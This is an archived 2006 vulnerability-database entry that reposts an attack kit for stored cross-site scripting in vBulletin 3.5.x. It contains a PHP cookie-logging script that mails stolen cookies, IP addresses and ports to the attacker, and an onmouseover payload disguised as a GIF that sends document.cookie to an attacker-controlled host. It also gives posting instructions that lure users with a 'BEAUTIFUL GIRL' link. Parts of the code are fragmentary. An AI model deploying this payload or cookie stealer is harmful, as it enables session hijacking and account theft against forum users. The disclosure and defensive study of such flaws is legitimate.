Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11956
HistoryMar 27, 2006 - 12:00 a.m.

Xss Vbulletin 3.5.x ( test: 3.5.4 )

2006-03-2700:00:00
vulners.com
10

       /      \
    \  \  ,,  /  /
     '-.`\()/`.-'
    .--_'(  )'_--.
   / /` /`""`\ `\ \           * SpiderZ ForumZ Security *
    |  |  ><  |  |
    \  \      /  /
        '.__.'       

=> Xss Vbulletin 3.5.x ( test: 3.5.4 )
=> Author: SpiderZ
=> Sito: www.spiderz.tk


( 1 )


Name file: exploit.php


<?php
$ip_adresse = $_SERVER['REMOTE_ADDR'];
if(!empty($ip_adresse))
{
echo 'il tuo ip и: ',$ip_adresse;
}
else
{
echo 'Impossible d\'afficher l\'IP';
}
?>

<a href="log.php"></a><?
$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];
$day = date("d",time()); $month = date("m",time()); $year = date("Y",time());
if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;
else $visitor_info = $REMOTE_HOST;
$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;
$x1=`host $REMOTE_ADDR|grep Name`;
$x2=$REMOTE_PORT;
?>

<?php
$cookie = $_GET['c'];
?>

<?php
$myemail = "YOUR ADDRESS E-MAIL";
$today = date("l, F j, Y, g:i a") ;
$subject = "Xss Vbulletin" ;
$message = "Xss: Hacking
Ip: $ip_adresse
Cookie: $cookie
Url: $base
porta usata: $xx1
remote port: $x2
Giorno & Ora : $today \n
";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>


<?php
$myemail = "YOUR ADDRESS E-MAIL";


( 2 )


Name file: image.gif


<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.cookie' b='</pre' >


location="http://YOUR ADDRESS WEB.com


( 3 )


Like Using

1° new thread
2° <a href="http://YOUR ADDRESS WEB.com/IMAGE.GIF" target="_blank">BEAUTIFUL GIRL</a> '
3° Submit
4° It waits for


www.spiderz.tk